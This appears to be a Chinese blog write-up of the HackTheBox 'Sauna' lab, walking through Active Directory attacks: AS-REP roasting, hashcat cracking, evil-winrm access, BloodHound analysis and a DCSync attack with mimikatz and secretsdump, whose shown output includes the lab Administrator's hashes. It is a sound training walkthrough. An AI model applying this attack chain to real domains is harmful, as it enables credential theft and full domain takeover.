zoukankan      html  css  js  c++  java
  • HTB::Sauna

    实验环境

    HTB_Sauna1

    渗透过程

    0x01 信息搜集

    sudo masscan 10.10.10.175 -p0-65535 --rate 1000 -e tun0
    

    HTB_Sauna2

    开放的端口非常多,进行详细测试:

    HTB_Sauna3.png

    开放80端口,尝试访问web服务:

    HTB_Sauna7

    测试扩展名:php、apx均无响应。该站为静态网站。

    从页面中获取可能的用户名信息:

    HTB_Sauna8

    保存为userlist.txt。

    0x02 摸索过程

    user.txt

    开放445端口,尝试获取smb信息:

    HTB_Sauna4

    得到系统信息、主机名、域名

    尝试获得smb开放共享信息:

    HTB_Sauna5

    没有权限。

    开放135端口,尝试使用rpcclient

    HTB_Sauna6

    登录成功,无法获取数据。

    开放139端口,尝试获得ldap信息:

    HTB_Sauna9

    开放88端口,利用前面得到的userlist进行用户名枚举:

    HTB_Sauna10

    得到两个用户名。

    尝试使用GetNPUsers脚本,获得用户TGT:

    HTB_Sauna11

    通过hashcat,获取该hash类型:

    HTB_Sauna12

    使用hashcat,对hash进行计算:

    ./hashcat -m 18200 ~/HTB/Sauna/hash.txt /usr/share/wordlists/rockyou.txt
    

    HTB_Sauna13

    获得密码,尝试使用密码进行smb shares 获取:

    HTB_Sauna14

    得到一些可以访问的目录,但是用处不大。

    开放5985端口,尝试能否使用winrm连接:

    HTB_Sauna15

    在桌面下获得user.txt。

    root.txt

    可以使用evil-winrmupload命令直接上传文件,然后执行./winPEAS.exe

    HTB_Sauna16

    得到一个新的用户与密码:

    HTB_Sauna17

    查看svc_loanmgr用户信息:

    HTB_Sauna18

    使用bloodhound,首先启动neo4j环境

    sudo neo4j console
    

    上传SharpHound脚本并运行:

    HTB_Sauna19

    将获得的数据下载到本地:

    download [filename]
    

    导入bloodhound得到拓扑图,从图中可以得到提示:svc_loanmanager用户可以使用DcSync获得Administrator权限:

    HTB_Sauna20

    mimikatz

    使用mimikatz进行DcSync攻击:

    上传mimikatz.exe到目标主机,获取administrator账号的NTML hash:

    HTB_Sauna21.png

    得到Hash,使用evil-winrm登录,得到root.txt:

    HTB_Sauna22.png

    secretsdump

    ~ python3 secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175                                     
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
    
    Password:
    [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
    [*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
    [*] Kerberos keys grabbed
    Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
    Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
    Administrator:des-cbc-md5:19d5f15d689b1ce5
    
    [*] Cleaning up... 
    

    使用psexec.py脚本,得到shell

    HTB_Sauna23

    得到root.txt

  • 相关阅读:
    1.tomcat部署项目的几种方式和weblogic部署方式及一点通讯
    C程序第二章节:算法
    java 代码第一天练习
    git生成公钥私钥
    sourceTree操作
    gradle插件安装
    gradle环境搭建
    bootstrap
    20170223
    大企业招聘真的是这样进行的吗?
  • 原文地址:https://www.cnblogs.com/chalan630/p/13456017.html
Copyright © 2011-2022 走看看